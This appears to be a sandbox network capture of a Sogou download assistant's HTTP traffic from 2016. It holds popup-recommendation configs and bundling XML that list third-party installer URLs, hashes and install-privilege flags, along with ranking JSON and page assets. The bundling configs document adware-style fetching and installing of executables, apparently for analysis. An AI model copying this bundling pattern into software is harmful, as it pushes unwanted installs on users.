hp?v=1.0.0.0&appname=sogoudownload_bindsecontrol&state=1]]></app
checkreporturl>....<url><![CDATA[hXXp://yze.t.sogou.com/ex
ternalapp/SogouSoftwareExternalApp.exe]]></url>....<md5>
;<![CDATA[c7fe7beca3334f0ff703cee41ddf1ad0]]></md5>...
<<< skipped >>>

GET /handleUserIdDb?userid=182290f2326cb222d4f13e5ed25565ed&unc=sogousoftware_normal&mode=recommend HTTP/1.1


User-Agent: HttpRequest
Host: xz.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:02 GMT
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
37d..<?xml version="1.0" encoding="utf-8"?>..<PopupRecommend&
gt;...<Global>....<MinPopupIntervalS>1800</MinPopupInte
rvalS>...</Global>...<RecommendMultiple Enable="true">.
...<ExecuteWhenStart>1</ExecuteWhenStart>....<WaitMinS&
gt;180</WaitMinS>....<WaitMaxS>480</WaitMaxS>....<
;MinPopupIntervalS>64800</MinPopupIntervalS>....<AutoClose
IntervalS>60</AutoCloseIntervalS>...</RecommendMultiple>
;...<RecommendSingle>....<WhenSoftwareRun Enable="true" Type=
"Client">.....<BlackList>123,456</BlackList>.....<Sa
mePcidMinPopupIntervalS>86400</SamePcidMinPopupIntervalS>....
.<AutoCloseIntervalS>60</AutoCloseIntervalS>....</WhenS
oftwareRun>....<AfterSoftwareInstall Enable="true" Type="Web">
;.....<ConfigUrl>hXXp://yze.t.sogou.com/cooperation/popuprecomme
nd/installfinishbind-qqbrowser.xml</ConfigUrl>.....<AutoClose
IntervalS>60</AutoCloseIntervalS>....</AfterSoftwareInstal
l>...</RecommendSingle>..</PopupRecommend>...0..HTTP/1.
1 200 OK..Server: nginx..Date: Thu, 19 May 2016 07:13:02 GMT..Content-
Type: text/plain; charset=UTF-8..Transfer-Encoding: chunked..Connectio
n: keep-alive..Cache-Control: no-cache..Expires: Thu, 01 Jan 1970 00:0
0:00 GMT..37d..<?xml version="1.0" encoding="utf-8"?>..<Popup
Recommend>...<Global>....<MinPopupIntervalS>1800</Mi
nPopupIntervalS>...</Global>...<RecommendMultiple Enab
<<< skipped >>>

GET /softRanking HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Set-Cookie: JSESSIONID=aaaBCX7sZraLvhokg3htv; path=/
eee..<!DOCTYPE HTML>..<html>.<head>.    <meta cha
rset="UTF-8">.    <meta http-equiv="X-UA-Compatible" content="IE
=edge,chrome=1" />.    <title>..................</title>
;.    <link rel="stylesheet" href="/softassis/css/ranking.css"/>
.    <link rel="shortcut icon" href="hXXp://logo.VVV.sogou.com/imag
es/logo2014/new/favicon.ico" type="image/x-icon">.    <script ty
pe="text/javascript" src="/js/jquery-1.11.1.min.js"></script>
..</head>.<style type="text/css">.    body{.        backgr
ound-color: #fff;.    }.    .scrolling .ranking-btn1 {.        margin-
right: 7px;.    }.    .search-box {.        background-color: #fff;.  
      width: 424px;.        font: 12px/21px "microsoft yahei", arial, 
sans-serif;.        color: #383838;.        overflow: hidden;.    }.  
  /* ...............css */.    .scroll-me {.        overflow: hidden;.
    }.    .scroll-list {.        width: 100%;.    }.    .scroll-list-w
rap {.        overflow: hidden;.    }.    .relative {.        position
: relative;.        /*margin:10px 0 10px 0;*/.    }.    /* ...........
................ */.    .scroll-bg {.        position: absolute;.     
   right: 3px;.        top: 0;.        border-radius: 4px;.        wid
th: 7px;.        background: #fff;.        behavior: url(ie-css3.htc);
   /*........................*/..    }.    /* ..................... */
.    .scroll-block {.        border-radius: 4px;.        width: 7px;. 
       position: absolute;.        left: 0;.        top: 0;.      
<<< skipped >>>

GET /softassis/js/jquery-1.7.2.min.js HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: application/x-javascript
Content-Length: 94840
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-17278"
Expires: Sun, 22 May 2016 07:13:10 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
/*! jQuery v1.7.2 jquery.com | jquery.org/license */.(function(a,b){fu
nction cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.pa
rentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<" a ">
;").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){c
k||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),
b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.c
ontentDocument).document,cl.write((f.support.boxModel?"<!doctype ht
ml>":"") "<html><body>"),cl.close();d=cl.createElement(
a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]
=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp
.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}functi
on cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return ne
w a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{re
turn new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c
=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k
=d[0],l,m,n,o,p;for(g=1;g<i;g  ){if(g===1)for(h in a.converters)typ
eof h=="string"&&(e[h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k=
=="*")k=l;else if(l!=="*"&&l!==k){m=l " " k,n=e[m]||e["* " k];if(!n){p
=b;for(o in e){j=o.split(" ");if(j[0]===l||j[0]==="*"){p=e[j[1] " " k]
;if(p){o=e[o],o===!0?n=p:p===!0&&(n=o);break}}}}!n&&!p&&f.error("No co
nversion from " m.replace(" "," to ")),n!==!0&&(c=n?n(c):p(o(c)))}}ret
urn c}function ca(a,c,d){var e=a.contents,f=a.dataTypes,g=a.respon
<<< skipped >>>

GET /js/scroll.js?vs=03 HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:14 GMT
Content-Type: application/x-javascript
Content-Length: 7035
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-1b7b"
Expires: Sun, 22 May 2016 07:13:14 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
.function Scroll(options) {.    var cssCore = function(testCss) {.    
    switch (true) {.            case testCss.webkitTransition === '':.
            return 'webkit'; break;.            case testCss.MozTransi
tion === '':.            return 'Moz'; break;.            case testCss
.msTransition === '':.            return 'ms'; break;.            case
 testCss.OTransition === '':.            return 'O'; break;.          
  default:.            return '';.        }.    }(document.createEleme
nt('ComicView').style),.    translate = function() {.        if (cssCo
re !== '') {.            return function(o, x, y) {.                o[
cssCore   'Transform'] = 'translate('   x  'px,'   y   'px) translateZ
(0)';.            } .        } else {.            return function(o, x
, y) {.                o.left = x   'px';.                o.top = y   
'px';.            }.        }.    }(),.    addClass = function(o, cls)
 {.        var oN = o.className;..        if (oN.indexOf(cls) === -1) 
{.            o.className = oN   ' '   cls;.        }.    },.    remov
eClass = function(o, cls) {.        var oN = o.className,.            
arrName,.            arrNow;..        if (oN.indexOf(cls) === -1) retu
rn;.        arrName = oN.split(' ');.        arrNow  = arrName.length;
.        while (arrNow--) {.            if (arrName[arrNow] === cls) {
.                arrName.splice(arrNow, 1);.            }.        }.  
      o.className = arrName.join(' ');.    },.    $$ = function(s) {. 
       return document.getElementById(s);.    };..    var c = $$(o
<<< skipped >>>

GET /img/recommend-btn.png HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:15 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: hXXp://xz.sogou.com/error
3f..The URL has moved <a href="hXXp://xz.sogou.com/error">here&l
t;/a>...0..HTTP/1.1 404 Not Found..Server: nginx..Date: Thu, 19 May
 2016 07:13:15 GMT..Content-Type: text/html; charset=utf-8..Transfer-E
ncoding: chunked..Connection: keep-alive..Cache-Control: no-cache..Exp
ires: Thu, 01 Jan 1970 00:00:00 GMT..Location: hXXp://xz.sogou.com/err
or..3f..The URL has moved <a href="hXXp://xz.sogou.com/error">he
re</a>...0......


GET /img/recommend-btn.png HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:16 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: hXXp://xz.sogou.com/error
3f..The URL has moved <a href="hXXp://xz.sogou.com/error">here&l
t;/a>...0..HTTP/1.1 404 Not Found..Server: nginx..Date: Thu, 19 May
 2016 07:13:16 GMT..Content-Type: text/html; charset=utf-8..Transfer-E
ncoding: chunked..Connection: keep-alive..Cache-Control: no-cache..Exp
ires: Thu, 01 Jan 1970 00:00:00 GMT..Location: hXXp://xz.sogou.com/err
or..3f..The URL has moved <a href="hXXp://xz.sogou.com/error">he
re</a>...0......


GET /softassis/img/loading.gif HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:17 GMT
Content-Type: image/gif
Content-Length: 12162
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-2f82"
Expires: Sun, 22 May 2016 07:13:17 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
GIF89a..........u..r..h..|..x.......................Z........~........
............Z.........................................................
........d..l..V.....i..Q..M..p...........T.._.....D.................`.
....R..f..............b..P.....X..........................Y...........
...............r....................n..\...........i..............O...
......................................................................
...........................................S........o..o..U........N..
b.................T........H..]..........................N............
....................e......................................`..........
.......{..............h...............................................
...O..........................d.......................................
...........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="..." i
d="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta
/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15    
    "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-synt
ax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adob
e.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:st
Ref="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="
Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:64E903EE2AC111
E58F97F39D602E280E" xmpMM:DocumentID="xmp.did:64E903EF2AC111E58F97F39D
602E280E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:64E903EC
2AC111E58F97F39D602E280E" stRef:documentID="xmp.did:64E903ED2AC111
<<< skipped >>>

GET /softRanking/loadMore?pageSize=10&pageNo=1 HTTP/1.1


x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: hXXp://xz.sogou.com/softRanking
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:18 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
2115..{"data":[{"docid":"-3080605666447722537","time":"2016-05-12","de
tails":".............................................","name":"QQ","do
wnloadnum":"0","pid":"34","cid":"1","logo_url":"http:\/\/cmc.imgstore.
cdn.sogou.com\/net\/a\/16\/link?appid=16&url=http://dl.app.s
ogou.com/pc_logo/-3080605666447722537.png&r=null","fullname":"
QQ","size":"54.25MB","hd_data":"{\"docid\":\"-3080605666447722537\",\"
icon\":\"http:\\\/\\\/dl.app.sogou.com\\\/pc_logo\\\/-3080605666447722
537.png\",\"name\":\"QQ\",\"pid\":\"34\",\"cid\":\"1\",\"size\":\"54.2
5MB\",\"sogouHighdownUrl\":\"http:\\\/\\\/xiazai.sogou.com\\\/comm\\\/
redir?softdown=1&u=YRyEVuHeM45mBjjEUSPVUEJm8GF_McJfVdEjKPrgnocp6RPTnPF
SKls2-N19zn1Vkn7odhWiVY2XtB1GttVabv1-ADEcrdTQ-iKClemVEPIO-inS8VQTtv5V2
hDxQGVyuN87GS8Q0oehm6RfSK3qEdVQPXpgHp2iMhxDAjN02n4mFjdOpBN0epdYeddfMeU
W&pcid=-3080605666447722537&filename=QQ8.3.exe\"}"},{"docid":"56328292
25944923461","time":"2016-04-13","details":"..........................
...................","name":"............","downloadnum":"0","pid":"34
","cid":"12","logo_url":"http:\/\/cmc.imgstore.cdn.sogou.com\/net\/a\/
16\/link?appid=16&url=http://dl.app.sogou.com/pc_logo/56
32829225944923461.png&r=null","fullname":"............","size":"49
.15MB","hd_data":"{\"docid\":\"5632829225944923461\",\"icon\":\"http:\
\\/\\\/dl.app.sogou.com\\\/pc_logo\\\/5632829225944923461.png\",\"name
\":\"............\",\"pid\":\"34\",\"cid\":\"12\",\"size\":\"49.15MB\"
,\"sogouHighdownUrl\":\"http:\\\/\\\/xiazai.sogou.com\\\/comm\\\/r
<<< skipped >>>

GET /softassis/img/ranking-ico.png HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:18 GMT
Content-Type: image/png
Content-Length: 1103
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-44f"
Expires: Sun, 22 May 2016 07:13:18 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
[email protected] ImageReadyq.e&
lt;...&iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.5-c021 79.155772, 2014/01/13-19:44:00        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CC 2014 (Windows)" xmpMM:InstanceID="xmp.iid:07A25883293D11E5BA4C
CD9836B368CC" xmpMM:DocumentID="xmp.did:07A25884293D11E5BA4CCD9836B368
CC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:07A25881293D11
E5BA4CCD9836B368CC" stRef:documentID="xmp.did:07A25882293D11E5BA4CCD98
36B368CC"/> </rdf:Description> </rdf:RDF> </x:xmpmet
a> <?xpacket end="r"?>Y..n....IDATx.b.......0..%.....8..h.3..
...D.C@@...J`..Q.F.....@|....`.....@[email protected]...{Py..d...K ^[email protected]
[email protected]....`3.8|.%HP.....db.^O..F..Q.F..5hp.k..T...[.=...)...^.b;Z
...4j..A..^.bK.z. ...umH..D.....IEND.B`.....


GET /softassis/img/ranking-ico.png HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:18 GMT
Content-Type: image/png
Content-Length: 1103
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-44f"
Expires: Sun, 22 May 2016 07:13:18 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
[email protected] ImageReadyq.e&
lt;...&iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.5-c021 79.155772, 2014/01/13-19:44:00        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CC 2014 (Windows)" xmpMM:InstanceID="xmp.iid:07A25883293D11E5BA4C
CD9836B368CC" xmpMM:DocumentID="xmp.did:07A25884293D11E5BA4CCD9836B368
CC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:07A25881293D11
E5BA4CCD9836B368CC" stRef:documentID="xmp.did:07A25882293D11E5BA4CCD98
36B368CC"/> </rdf:Description> </rdf:RDF> </x:xmpmet
a> <?xpacket end="r"?>Y..n....IDATx.b.......0..%.....8..h.3..
...D.C@@...J`..Q.F.....@|....`.....@[email protected]...{Py..d...K ^[email protected]
[email protected]....`3.8|.%HP.....db.^O..F..Q.F..5hp.k..T...[.=...)...^.b;Z
...4j..A..^.bK.z. ...umH..D.....IEND.B`.HTTP/1.1 200 OK..Server: nginx
..Date: Thu, 19 May 2016 07:13:18 GMT..Content-Type: image/png..Conten
t-Length: 1103..Connection: keep-alive..Last-Modified: Tue, 17 May 201
6 07:09:36 GMT..ETag: "573ac3b0-44f"..Expires: Sun, 22 May 2016 07:13:
18 GMT..Cache-Control: max-age=259200..Accept-Ranges: bytes...PNG.....
[email protected] ImageReadyq.e<..
<<< skipped >>>


GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8782146-11709527
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:21 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=11326565-11578455
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:39 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /handleUserIdDb256?userid=182290f2326cb222d4f13e5ed25565ed&downloadtype=software&unc=sogousoftware_normal&pcid=2320808333768086190&mode=recommend HTTP/1.1
User-Agent: HttpRequest
Host: xz.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:02 GMT
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
ca5..<?xml version="1.0" encoding="utf-8"?>.<DOCUMENT>..&l
t;bindtype><![CDATA[thirdparty_pcmgr_qb]]></bindtype>..
.<item>.        <weight><![CDATA[0]]></weight>
.        <name><![CDATA[pcmgr]]></name>...<descri
ption><![CDATA[.....................QQ.........]]></descri
ption>.        <installedfeature>....<type><![CDATA[
keyandpath]]></type>....<key><![CDATA[HKEY_LOCAL_MAC
HINE\SOFTWARE\Tencent\QQPCMgr]]></key>....<valuename>&l
t;![CDATA[InstallDir]]></valuename>...</installedfeature&g
t;...<appcheckurl><![CDATA[hXXp://t.sogou.com/update_platform
/update.php?appname=sogoudownload_bindpcmgrcontrol&v=1.0.0.0]]><
/appcheckurl>...<appcheckreporturl><![CDATA[hXXp://t.sogou
.com/update_platform/done.php?v=1.0.0.0&appname=sogoudownload_bindpcmg
rcontrol&state=1]]></appcheckreporturl>...<url><![CD
ATA[hXXp://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/SuiteDownloader
20160222153349.exe]]></url>...<md5><![CDATA[962ab692
3623cfa37d0e7133c7a9d0bb]]></md5>...<installparam><!
[CDATA[]]></installparam>...<silentinstall><![CDATA[
false]]></silentinstall>...<installprivilege><![CDAT
A[true]]></installprivilege>...<installtype><![CDATA
[installpackage]]></installtype>...<installpackage>....
<url><![CDATA[hXXp://dlied6.qq.com/invc/xfspeed/qqpcmgr/d
<<< skipped >>>

GET /softRecommend HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Set-Cookie: JSESSIONID=aaanEMDtrFcWQ8kkg3htv; path=/
eee..<!DOCTYPE HTML>..<html>.<head>.    <meta cha
rset="UTF-8">.    <meta http-equiv="X-UA-Compatible" content="IE
=edge,chrome=1" />.    <title>..................</title>
;.    <link rel="stylesheet" href="/softassis/css/recommend.css?vs=
1.0"/>.    <link rel="shortcut icon" href="hXXp://logo.VVV.sogou
.com/images/logo2014/new/favicon.ico" type="image/x-icon">.    <
script type="text/javascript" src="/softassis/js/jquery-1.7.2.min.js"&
gt;</script>.    <script type="text/javascript">.        $
(function(){.            $(".rec-banner").hover(function(){.          
      $(this).children("span").toggleClass("state");.            }).  
          //@Mr.Think***.......            var $cur = 1;//............
.............            var $i = 1;//................            var 
$len = $('.showbox>ul>li').length;//.....................(......
).            var $pages = Math.ceil($len / $i);//....................
.....            var $w = $('.rec-banner').width();//.................
...........            var $showbox = $('.showbox');.            var $
num = $('.banner-doc li').            var $pre = $('span.left-btn').  
          var $next = $('span.right-btn');.            var $autoFun;. 
           //@Mr.Think***...................            autoSlide();. 
           function pre(){.                if (!$showbox.is(':animated
')) {  //............................                    if ($cur == 1
) {   //.....................,....................................
<<< skipped >>>

GET /softassis/css/recommend.css?vs=1.0 HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
